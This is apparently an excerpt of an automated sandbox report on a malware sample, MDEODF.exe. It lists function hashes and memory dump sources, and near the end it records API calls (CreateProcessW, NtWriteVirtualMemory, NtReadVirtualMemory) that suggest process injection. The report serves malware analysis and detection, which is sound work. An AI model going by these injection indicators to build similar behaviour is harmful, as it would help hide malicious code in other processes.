Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f7841516c11e2166d73d7df42d5782d43577201b04205d092ee33bd986fa4fa
Instruction ID: c0bb46653d46ab008710b2461cdd2ff056536843a9e0520dcf70c71dcc58bef1
Opcode Fuzzy Hash: 5f7841516c11e2166d73d7df42d5782d43577201b04205d092ee33bd986fa4fa
Instruction Fuzzy Hash: DE310E74E05228CFCB04CFA9C844AECBBF5BF89320F148269D409B73A1D7749942CB50

Function 0026D5F4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636828264.000000000026D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0026D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26d000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80519909745c150b0ca09eb86cb4b2e66d220be539aaf09462b5cd7d7129651c
Instruction ID: 2e09b2c84435207fa21e0d86e3e81776ce33ea0064afc81344403ab605f4f26b
Opcode Fuzzy Hash: 80519909745c150b0ca09eb86cb4b2e66d220be539aaf09462b5cd7d7129651c
Instruction Fuzzy Hash: A2213AB1A14248DFDB15CF14E8C0F26BF69FB88314F34C569E8094B246C376D8A6CBA1

Function 00303128 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88691c62b5072ad75414c182c1c7b4bcd21bb607ba8c100bb67d75437b098f72
Instruction ID: c58876477ebd703881f85a94939a6b0afe3dacee59d0e5019ae13095ba020528
Opcode Fuzzy Hash: 88691c62b5072ad75414c182c1c7b4bcd21bb607ba8c100bb67d75437b098f72
Instruction Fuzzy Hash: BE312CB0D0025A9FCB05DFA8D894DEEBBB1FF49300B414666E455BB2A1D7309D4ACB54

Function 00301F08 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e590ff12455a1a8029fd408c26335465e93f374b8f8847592a7d95a051daa34
Instruction ID: d64ae1d6a27f86ed477855ac40c08e48aaf71c98c138ed47176c1455a15894f4
Opcode Fuzzy Hash: 7e590ff12455a1a8029fd408c26335465e93f374b8f8847592a7d95a051daa34
Instruction Fuzzy Hash: 87315C70D0025A9FCB06DFA8D854ADDBFB1FF49300F4182AAD494BB266D770A946CF90

Function 00307E67 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e16ab4357c8fa293419e52814c5d3031d3b99ea8d21aca077131bd70ed1a67d4
Instruction ID: 8e1da72df109ac5f59e36512c8652ef17c3584819f4dad246b5ee0423e8ff3bb
Opcode Fuzzy Hash: e16ab4357c8fa293419e52814c5d3031d3b99ea8d21aca077131bd70ed1a67d4
Instruction Fuzzy Hash: 58312A70D0429A9FCF06DFA8D8509DDBBB1FF49310F5082A6D454BB262C730AD8ACB90

Function 0030EA80 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07e67c19e258efb1a6c9349ffd35aaf52bf21cf0794f442b6afc7b5cae167fb6
Instruction ID: e610bb8dfda99ac8aff43a63904c7263e4e682d85359096ba6dcc6a0d456fb42
Opcode Fuzzy Hash: 07e67c19e258efb1a6c9349ffd35aaf52bf21cf0794f442b6afc7b5cae167fb6
Instruction Fuzzy Hash: 5B310C70E0025A9FCB05DFA8D950ADDBBB1FF49310F4186AAD854BB266D730994ACF90

Function 0030FC10 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13d2eedce153c9ef07047529017e8a8de1a99bbf457f704e46f6079283ff0eae
Instruction ID: 8c51666ebc77c9d941b3c7936d475ba42eb84744ef2159512a5eabde9e89dbc4
Opcode Fuzzy Hash: 13d2eedce153c9ef07047529017e8a8de1a99bbf457f704e46f6079283ff0eae
Instruction Fuzzy Hash: 69313970D0024A9FCB05DFA8D850ADDBBB1FF45300B4186AAD850BB262D730AE4ACF90

Function 00305118 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b4161080897271bd1d4876dfde1a504947e11fac988be77a794e7eddaf75a5
Instruction ID: 507df7a50aa2558526e07230f14dce25ded127b6b92aac12433e745f075d3c5d
Opcode Fuzzy Hash: 67b4161080897271bd1d4876dfde1a504947e11fac988be77a794e7eddaf75a5
Instruction Fuzzy Hash: 98311C71D0029A9FCB06DFA8D5909DDBBB1FF49300F4182AAD454BB296D770AA46CF90

Function 0030DAD8 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5007f4fef6d7b7102bdac0f25905059fb2a4f9e79bb8264f3a689a3e40ed4af6
Instruction ID: a68a909b73812bce52f7952fa09ca6ca4172b53c573fd9f172771bed5293596c
Opcode Fuzzy Hash: 5007f4fef6d7b7102bdac0f25905059fb2a4f9e79bb8264f3a689a3e40ed4af6
Instruction Fuzzy Hash: E9211C71D0025A9FCB05DFA8D850ADDBBB1FF49300F4186A6D854BB266D730A94ACB94

Function 0030D818 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea62732f5fe0be4a040cbf2d64b3a1b7108ea14be64d2659c16360e451eebc2f
Instruction ID: edbc9e27cc3eec2d2036da237baa9ebe50351fcab1293473fe5a704e784b0e72
Opcode Fuzzy Hash: ea62732f5fe0be4a040cbf2d64b3a1b7108ea14be64d2659c16360e451eebc2f
Instruction Fuzzy Hash: 77212B70E0024A9FCB05DFA8D454ADEBBB1FF49300F4082A6D9547B265D730E946CB95

Function 003056C0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db6616bf0dcdfd0a8956fd7b83090de54e631c31bc8f40faadf4d040bed25f55
Instruction ID: efc950efbf97c016a945061eff68fe2b439a76e823df75b4068f38d2d989acc8
Opcode Fuzzy Hash: db6616bf0dcdfd0a8956fd7b83090de54e631c31bc8f40faadf4d040bed25f55
Instruction Fuzzy Hash: 81215C70D0428E9FCF05DFA8D450ADDBFB1AF45310F4482A6D860BB2A2D730A94ACF51

Function 0030D820 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e94ee55d4740e441b16ae9b5c659579e1d2bfc67df0d946ce6133fa51947904
Instruction ID: bda8c94efd223da5d1317a69aab968553433271cc28f2b8a0eb968baefcfc0c6
Opcode Fuzzy Hash: 4e94ee55d4740e441b16ae9b5c659579e1d2bfc67df0d946ce6133fa51947904
Instruction Fuzzy Hash: 2F210A70E0024E9FCB05DFA8D454ADEBBB1FF49300F4182A6D554BB255D730E946CB95

Function 00305128 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59d3c1589f11c5b1a6e1f72bcdc9e6e25b0e83abdb66d98676006a1860998259
Instruction ID: 253d0f7c603af9cf7115c44901501314c4404f74cb46b7b5c3baee51e6f0aa57
Opcode Fuzzy Hash: 59d3c1589f11c5b1a6e1f72bcdc9e6e25b0e83abdb66d98676006a1860998259
Instruction Fuzzy Hash: E421E771E0025E9FCF05DFA8D590ADDBBB1FF49300F4182A6D454BB255D770AA46CB90

Function 0026D5EF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636828264.000000000026D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0026D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26d000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce44f6fe7a28b32b333783b460579ef617a672a1c87bb5bd3d66835bf8f739a8
Instruction ID: 87a0098ef34a9b68c9de7e6a991ea41463bccdc7430213e46c67fd5bce470416
Opcode Fuzzy Hash: ce44f6fe7a28b32b333783b460579ef617a672a1c87bb5bd3d66835bf8f739a8
Instruction Fuzzy Hash: E611D376904285CFDB16CF14E9C4B16BF71FB84314F28C5A9D8484B656C336D8AACBA1

Function 003078B1 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4b50504c777f423791cbee2803782c1274202931f4e308c347c79f5a2df2dab
Instruction ID: 8575e4b4d9083f74a01382ff3792bb043c93a0978f95227371d09f258ee70f70
Opcode Fuzzy Hash: d4b50504c777f423791cbee2803782c1274202931f4e308c347c79f5a2df2dab
Instruction Fuzzy Hash: A7115EB4D092499FCB01DFA9C5946AEBFF5BF45300F1481AAE444E7291D3349A40CF61

Function 00303010 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 322372e4a51ac352fb2ba1726553e9fd6e0e4fd306048d58302977fcab918dec
Instruction ID: 4222bd3394b0fae39fa76c7f415b27b08fd7184eb41398871fcadfd45d4a3237
Opcode Fuzzy Hash: 322372e4a51ac352fb2ba1726553e9fd6e0e4fd306048d58302977fcab918dec
Instruction Fuzzy Hash: 7B017830905289DFCB02DF68C590E8DBFB1AF86300F2486EAD4446B266C6349E86DB85

Function 00301870 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffeb081d0526aebc939cf242ade563d7488d7291520d38023b47e9af8358ac6c
Instruction ID: 7e72e2b57040cd423de55a506334ce7f1d78838a2c9860518eb2b37c2be33fed
Opcode Fuzzy Hash: ffeb081d0526aebc939cf242ade563d7488d7291520d38023b47e9af8358ac6c
Instruction Fuzzy Hash: 5BF0AF75C08289CBDF02DFA5D8253EEBBF0AB49300F149169C415B7281D7780A45CF50

Function 00301880 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87572155ba58e70ed6f51a012e153967defa282f491b71d84146d2be72eea2f7
Instruction ID: e963199f134d6e4f465f060afcaaebcac8b9aeaa1a659e333515afd90ef2d5cf
Opcode Fuzzy Hash: 87572155ba58e70ed6f51a012e153967defa282f491b71d84146d2be72eea2f7
Instruction Fuzzy Hash: 37F01774D0420DCADF01DFAAD4243EEBBF8AB89310F10A025D41477281DB395A19CFA0

Function 00303CD0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6461710ef6172e92db8fb9117e5cf6f007623cf98a224c37358fbdccccb21264
Instruction ID: 53fb612e0394009f387f10cc7cbfd6e8827351f61ce1c9e0a0052908d7c30b35
Opcode Fuzzy Hash: 6461710ef6172e92db8fb9117e5cf6f007623cf98a224c37358fbdccccb21264
Instruction Fuzzy Hash: 55F0F87490A244DFCB16DF68D59499CBFB0EF96310F2582DAC884A7256C3758A86CF41

Function 003025B8 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b073237478c6af6037e5b2dabb7866d491132eafe6b616bc41dbb71452afe72
Instruction ID: 1ffeedb3913eaeb24d90f991da04b92f822c1f71a5b5ce1d1919b4ebd6fa47bc
Opcode Fuzzy Hash: 9b073237478c6af6037e5b2dabb7866d491132eafe6b616bc41dbb71452afe72
Instruction Fuzzy Hash: 7CE065317051046F8B49DA09D8549ABBBAEEBC9370314C02AF848C7310DA31DC52D794

Function 00303C07 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aa0c5a1e6d70ed449736250ef7a5de3fe44c74263c8c339b6523784ddf5a9b0
Instruction ID: e05dacf8b3c43803f24b40dfe03a52431653bee7afd88de8b4c11ee9fb1a1ef2
Opcode Fuzzy Hash: 8aa0c5a1e6d70ed449736250ef7a5de3fe44c74263c8c339b6523784ddf5a9b0
Instruction Fuzzy Hash: D3F0D4B0E046188FDB24CF5AD8447A9F7F5AF8A310F9591A5C05DA7265D6309A51CF01

Function 00307868 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a700ca8c60782db5b5f11ca392037ea4a5cb2fcc313527d703f211198b95d0e7
Instruction ID: c4e33fb8856b9c06dc849e35cb2b6d1d5d8f328a1c96a86eb6cef04845ef9ccc
Opcode Fuzzy Hash: a700ca8c60782db5b5f11ca392037ea4a5cb2fcc313527d703f211198b95d0e7
Instruction Fuzzy Hash: 69F0E570D0A240CFC306CF789964A59BFF0DF8A300B1981DAC448D72B2D6358900CB11

Function 003009F0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 558a7374cca65b9d0201f68035db721f2e1805220c0d1a567c5d7e8ddeff3b2e
Instruction ID: d7b8f3f186b72af82ca63a2087c9035fb07f0f267b578637867ec91f748125c8
Opcode Fuzzy Hash: 558a7374cca65b9d0201f68035db721f2e1805220c0d1a567c5d7e8ddeff3b2e
Instruction Fuzzy Hash: CCF0B274D0020DDFCB45EFA8E9556AEBBB4FB45300F1046AAC419A7290EB709A84CB80

Function 0030F131 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9233d4bb597a5d660eb7554e953125d68ef513d3c65f18807efbd32680928fe
Instruction ID: 3953afb81c269508bcde865abd9ba209c440966a6890fd3d9110c579a9926520
Opcode Fuzzy Hash: b9233d4bb597a5d660eb7554e953125d68ef513d3c65f18807efbd32680928fe
Instruction Fuzzy Hash: 78E06D3084A284CFC716DFB8D56496CBF70AF43300F5941EEC8846B3A2C7344A50D782

Function 00302F8F Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0760d618b9c5be269ba7e72e51e5125d70bb2eaeae3407fc82b164e0f50c2397
Instruction ID: 098ce9d0f05d1af2880adffb69cf2444770c29a384d450cf3d0f0404e8c0f10b
Opcode Fuzzy Hash: 0760d618b9c5be269ba7e72e51e5125d70bb2eaeae3407fc82b164e0f50c2397
Instruction Fuzzy Hash: 6CE0E574E04208CFCB28CF9AE8408ADB7B1BFC9324B109165D019AB2A4D730ED12CB40

Function 0030244D Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be05b2b3dde44f7793aede3618bd981e228625e550df5a829eed8ed9839ffad9
Instruction ID: 12308f725d8541259376e1c1d2f1c9d8c02b04ddb390eb52d55f2fe437e78b0a
Opcode Fuzzy Hash: be05b2b3dde44f7793aede3618bd981e228625e550df5a829eed8ed9839ffad9
Instruction Fuzzy Hash: 53E08674E08104CBCB24CFDAE4505FDB7B5EFC5320F2061A5C005B3291C6309E128F50

Function 00303CE0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1716010483f025eaf4d0a40c560d679e2e2ebd5ed37042fac155d5b87b55242
Instruction ID: bc7bbd929f2f139587ec14d00e178919c1458df84d20ff3b40a1401e02914779
Opcode Fuzzy Hash: e1716010483f025eaf4d0a40c560d679e2e2ebd5ed37042fac155d5b87b55242
Instruction Fuzzy Hash: E4E01A34901208DFC704DFA8D58495DFBB5EB85310F1482A9D84863354C7319E80DF84

Function 00306D60 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d87bbf0238cbe4f9eccd28fd591a8fcba20e88fc38825780cb71886c8c4103e0
Instruction ID: 78be2f453204c346f6dd61e2156042a714aa4de93647df94358869230631acc8
Opcode Fuzzy Hash: d87bbf0238cbe4f9eccd28fd591a8fcba20e88fc38825780cb71886c8c4103e0
Instruction Fuzzy Hash: EEE08670901208EFC701EFB8F819B5D77B4EB45300F104969D40893254DB715E58CB55

Function 003042AE Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e31807089cdb6ab0c3c3cc91ebaac2e88745b696acbf83911cf8da00c650c387
Instruction ID: b37067df707198e37aa6a9446806aa1abd11cc16fce0a11dcbeb76df351c1b27
Opcode Fuzzy Hash: e31807089cdb6ab0c3c3cc91ebaac2e88745b696acbf83911cf8da00c650c387
Instruction Fuzzy Hash: A4E0B674F042189BCB14DFE9E8405ACB776AFC6324F009266A559BB295D7309956CB40

Function 003055FF Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78ca28cac665bd5a47c867583e53f2b2da41aa17d4381849f9d2ee43811a83e0
Instruction ID: ec80c38e45a4733d5d70896dd7271a453dec9cd57f2ea214e5d64af75dc83829
Opcode Fuzzy Hash: 78ca28cac665bd5a47c867583e53f2b2da41aa17d4381849f9d2ee43811a83e0
Instruction Fuzzy Hash: 65E0EC75E042489BCF24DFD8E4806EDBBB1AFC5325F2051A5C115B72A4D6319D95CF44

Function 00305612 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43a62a65ca7101941e6508fec7028a8e85a7391ab287d570f1d7fb3cf0320753
Instruction ID: dfd96b2669cae0b1c9dae7986d33c8af6e0ba604b96f3c9aa99e8ef0b9f43327
Opcode Fuzzy Hash: 43a62a65ca7101941e6508fec7028a8e85a7391ab287d570f1d7fb3cf0320753
Instruction Fuzzy Hash: 65E0B674E442888BCB24CFD8E4906DDBBB1EB84325F1012A5D519AB2A9D3309991CF41

Function 0030FEF0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30cb213ac67cb3625f4b74ce77f893173baafc8f19b1955d73639a4d44f36ae1
Instruction ID: 938c247987453322542058079b7286a0391981f2c6c7acc1b9ef1cb9c7c0e40e
Opcode Fuzzy Hash: 30cb213ac67cb3625f4b74ce77f893173baafc8f19b1955d73639a4d44f36ae1
Instruction Fuzzy Hash: A5E08C3600D3C49FC7068FA09C248A93F269F5A200B08C0DAF8C48A1A3C5318861D722

Function 0030FF00 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.636888332.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_300000_MDEODF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d312bbdc3dad39e55d0e4a8b2edb11def89cfdaea8576af28a2ab1166dcd810c
Instruction ID: 176647db34ab5ac5906638f808d29dec0fd2629a8fd684d31cad27647a8893ad
Opcode Fuzzy Hash: d312bbdc3dad39e55d0e4a8b2edb11def89cfdaea8576af28a2ab1166dcd810c
Instruction Fuzzy Hash: 32D0127A10424CAB8B09CF95EC14CFA7B6FAB88211B04C019FD1945151CA32D961EB60

Analysis Process: MDEODF.exePID: 3884, Parent PID: 3812COMMON

Execution Graph

Execution Coverage:	27%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	129
Total number of Limit Nodes:	0

Executed Functions

Function 0030B870 Relevance: 1.9, APIs: 1, Instructions: 397
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?), ref: 0030BCBF

Memory Dump Source

Source File: 00000008.00000002.377619117.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_300000_MDEODF.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2f4f15510423cb727dee9df8e906525ee2a3e801f8594d9c0406463ce9f24cc5
Instruction ID: ca0ca2e0b85259012a1a2ca23c00ecff28beec2d32c9d008125d23661f9bead5
Opcode Fuzzy Hash: 2f4f15510423cb727dee9df8e906525ee2a3e801f8594d9c0406463ce9f24cc5
Instruction Fuzzy Hash: 1302CD74E01229CFDB25CFA9C891B9DFBB1BF49304F1081A9E819B7291DB349A85CF54

Function 0030C670 Relevance: 1.6, APIs: 1, Instructions: 119
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 0030C748

Memory Dump Source

Source File: 00000008.00000002.377619117.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_300000_MDEODF.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 52cbf98037d8fa3889926ec85a058a46c63661c86a3de33be5d72b80bb6e260b
Instruction ID: f99e1c93cc9a1014d12a2c2eca5afdfc0206f1591c8712c2501c6f001b032842
Opcode Fuzzy Hash: 52cbf98037d8fa3889926ec85a058a46c63661c86a3de33be5d72b80bb6e260b
Instruction Fuzzy Hash: 9141BAB5D012489FCF10CFA9D984AEEFBF1AF49314F24942AE815B7250C338AA45CF64

Function 0030C678 Relevance: 1.6, APIs: 1, Instructions: 115
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 0030C748

Memory Dump Source

Source File: 00000008.00000002.377619117.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_300000_MDEODF.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: b62408250f743532bbd8d0751ef145b85175377f0defd38dae2125c4a6646d00
Instruction ID: 37d95389433e59f47f4c40c930bfc7566fc12520e5f1a33ed045b0f5700f5058
Opcode Fuzzy Hash: b62408250f743532bbd8d0751ef145b85175377f0defd38dae2125c4a6646d00
Instruction Fuzzy Hash: D241A9B5D012589FCF00CFA9D984AEEFBF1BB49314F24942AE814B7250D339AA45CF64

Function 0030C320 Relevance: 1.6, APIs: 1, Instructions: 109
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 0030C3DA

Memory Dump Source

Source File: 00000008.00000002.377619117.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_300000_MDEODF.jbxd

Similarity

API ID: MemoryReadVirtual
String ID:
API String ID: 2834387570-0
Opcode ID: 21a060a1c5665d855cbe166ef76057e7c4d758d63d787548af0a90763d110ad4
Instruction ID: 9c78550673e0c2edc4deff2e6e74d168ddfe7f976b84422a314e75ceae4fe69f
Opcode Fuzzy Hash: 21a060a1c5665d855cbe166ef76057e7c4d758d63d787548af0a90763d110ad4
Instruction Fuzzy Hash: 8441ACB9D002589FCF10CFA9D894AEEFBB1BF49310F14A42AE815B7250C779A945CF64

